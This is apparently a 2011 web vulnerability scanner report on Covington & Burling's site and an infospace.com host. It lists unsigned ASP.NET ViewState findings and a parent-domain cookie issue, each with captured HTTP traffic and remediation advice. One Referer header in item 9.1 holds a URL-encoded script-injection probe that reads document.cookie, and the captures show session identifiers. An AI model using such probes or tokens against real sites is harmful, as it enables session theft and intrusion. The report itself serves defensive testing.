8. ASP.NET ViewState without MAC enabled  previous  next
There are 10 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


8.1. http://www.cov.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /

Request

GET / HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1116; path=/
Set-Cookie: PortletId=1040301; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 29292
Set-Cookie: NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660;path=/
Content-Length: 29292


<html>
   <head><meta name="description" content=""><meta name="KEYWORDS" content="litigation">
<title id="htmlTitle">Covington &amp; Burling LLP</title>
       <link href="/FCWSite/Include/gene
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjI4MTgzNzMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJYnRuU2VhcmNo" />
...[SNIP]...

8.2. http://www.cov.com/en-US/regions/middle_east/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /en-US/regions/middle_east/

Request

GET /en-US/regions/middle_east/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Middle East</titl
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUYY3RsMDAkc2l0ZVRvb2wkYnRuU2VhcmNo" />
...[SNIP]...

8.3. http://www.cov.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1116; PortletId=1040301; SiteId=1087; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; ZoneId=7; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:08:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 425
Content-Length: 425


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQ=" />
...[SNIP]...

8.4. http://www.cov.com/health_care/health_care_reform/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /health_care/health_care_reform/

Request

GET /health_care/health_care_reform/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Health Care Refor
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjEyNjMzMTM4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJHNpdGVUb29sJGJ0blNlYXJjaA==" />
...[SNIP]...

8.5. http://www.cov.com/industry/financial_services/dodd_frank/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /industry/financial_services/dodd_frank/

Request

GET /industry/financial_services/dodd_frank/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Dodd-Frank Regula
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjEyNjMzMTM4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJHNpdGVUb29sJGJ0blNlYXJjaA==" />
...[SNIP]...

8.6. http://www.cov.com/ja-JP/practice/region.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ja-JP/practice/region.aspx

Request

GET /ja-JP/practice/region.aspx?service=9648 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=9ea607c8-9b1f-4d48-8f17-55bea1b70c47; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle"> | | ......</title>
<meta name="language" content="9ea607c8-9b1f-4d48-8f17-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" />
...[SNIP]...

8.7. http://www.cov.com/ko-KR/practice/region.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ko-KR/practice/region.aspx

Request

GET /ko-KR/practice/region.aspx?service=9649 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=af203ebe-34a8-4674-98e1-76447e0b5d76; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">......... &amp; ...... ............ | | ......</title>
<meta name="language
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" />
...[SNIP]...

8.8. http://www.cov.com/news/detail.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Request

GET /news/detail.aspx HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10753


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzE1OTYxMjg0ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUYY3RsMDAkc2l0ZVRvb2wkYnRuU2VhcmNo" />
...[SNIP]...

8.9. http://www.cov.com/practice/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Request

GET /practice/ HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:19:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247861
Content-Length: 247861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTk0NjM5ODc0NmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJHNpdGVUb29sJGJ0blNlYXJjaA==" />
...[SNIP]...

8.10. http://www.cov.com/zh-CN/practice/region.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cov.com
Path:   /zh-CN/practice/region.aspx

Request

GET /zh-CN/practice/region.aspx?service=9647 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:45:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.cov.com/zh-CN/offices/office.aspx?office=64
Set-Cookie: Language=8d3b6585-6a63-4372-bcac-71fa92156eab; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21150

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2>
</body></html>


<!DOCTYPE HTML PUBLIC "-/
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" />
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 42 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://wsdsapi.infospace.com/infomaster/widgets  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=PgapVn1EAUuRePVjFvlFYwcvTOazzW42D5eIHH6piUwcdvq_V4SRYlK6ijKxtkcW8OMfUcCaxtJlWL8EdzErEAnKF_LukoLYq0q5jhT6yLmW31wIntrMqxy0narGTb0gkD094FWrtHGfsD0emWtUGf9JJWM2YNnr7chRn25YV24fvG5r0; expires=Fri, 14-Dec-2012 03:31:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qdazgl45ypx3f1qrme5x2145; path=/
Set-Cookie: DomainSession=TransactionId=84ceabcd16f34682b3c0c7deaeb7cb01&SessionId=158b74d0aee4477eab3fc7deaeb7cb01&ActionId=e1845d6a04044c2b87eec7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 17:11:27 GMT; path=/
